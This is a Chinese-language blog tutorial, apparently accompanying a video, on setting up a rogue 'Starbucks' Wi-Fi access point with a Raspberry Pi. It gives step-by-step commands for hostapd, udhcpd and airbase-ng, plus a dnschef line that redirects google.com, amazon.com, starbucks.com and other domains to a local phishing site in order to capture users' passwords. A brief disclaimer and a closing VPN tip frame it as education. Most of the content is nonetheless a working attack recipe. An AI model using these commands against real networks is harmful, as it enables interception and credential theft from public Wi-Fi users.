【视频教程】公共WIFI安全吗?可以捕获到你的密码?星巴克案例分享

相关声明

以下教程仅限于教育学习目的,未经授权请勿进行黑客攻击,否则您将承担相应的法律责任。

相关阅读

之前我们讲过ARP欺骗、DNS投毒,并出过详细的教程

今天我们为大家准备了视频讲解,更注重于其中的原理和实战,配合树莓派完成。

视频讲解

硬件设备

图文教程

视频中使用的命令我们也做了总结,方便大家学习

场景一

启动apache服务

service apache2 start

设置无线网卡监听模式

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng wlan0

编辑hostapd.conf

nano /etc/hostapd/hostapd.conf

修改ssid值,改成星巴克的名字

ssid=Starbucks

启动wlan0以及hostapd

ifup wlan0
service hostapd start

启动udhcpd

udhcpd -f

使用dnschef来进行dns欺骗

thesprawl.orggoogle.com*.ikea.com*.netflix.com*.amazon.com*.target.com*.startbucks.com这些网站设置跳转到我们的apache下服务的站点

dnschef --nameservers=1.1.1.1#53 --fakeip=192.168.10.1 --interface=192.168.10.1 --fakedomains=thesprawl.org,google.com,*.ikea.com,*.netflix.com,*.amazon.com,*.target.com,*.starbucks.com

三者启动后仔细看ipad访问情况

图片[1]-【视频教程】公共WIFI安全吗?可以捕获到你的密码?星巴克案例分享-FancyPig's blog

然后在访问刚才dns欺骗的网址,例如starbucks.com星巴克官网时,就会代理到192.168.10.39树莓派设置的apache服务的网站中

图片[2]-【视频教程】公共WIFI安全吗?可以捕获到你的密码?星巴克案例分享-FancyPig's blog

对于宜家也是如此,访问ikea.com时,也会跳转到dns欺骗后设置的本地地址

图片[3]-【视频教程】公共WIFI安全吗?可以捕获到你的密码?星巴克案例分享-FancyPig's blog

场景二

场景二与一类似,可以使用下面airbase-ng命令来设置wifi名称和mac地址

airbase-ng -e "Conversations Wifi" -a 82:2A:A8:87:3C:57 -c 1 wlan0
图片[4]-【视频教程】公共WIFI安全吗?可以捕获到你的密码?星巴克案例分享-FancyPig's blog

连接到我们设置的Conversations WiFi

图片[5]-【视频教程】公共WIFI安全吗?可以捕获到你的密码?星巴克案例分享-FancyPig's blog

效果也是类似的,也是会将访问的星巴克网址代理到本地的apache搭建的网站上

图片[6]-【视频教程】公共WIFI安全吗?可以捕获到你的密码?星巴克案例分享-FancyPig's blog

如何安全的连接公共Wifi

专家建议连接公共Wifi时,可以开启自己手机的代理,不一定非选择视频中推荐的NordVpn。

您可以参考下面的教程

上网指南-FancyPig's blog
上网指南-FancyPig's blog
FancyPig的头像-FancyPig's blog汉堡会员1年前
92014.3W+1932

开启VPN后流量会走加密的代理,arp欺骗、dns投毒就很容易失效了,因此,公共wifi就监控不到你的个人隐私了,但是代理使用免费的部分也有风险,也就是我们常说的代理是不是干净,如果不干净也不安全。当然,之前也有热心网友出了一期教程,我们也可以参考自建代理节点(这种方式最安全,当然也比较折腾,留给喜欢折腾的人看)

© 版权声明
THE END
喜欢就支持一下吧
点赞36赞赏 分享
评论 共4条

请登录后发表评论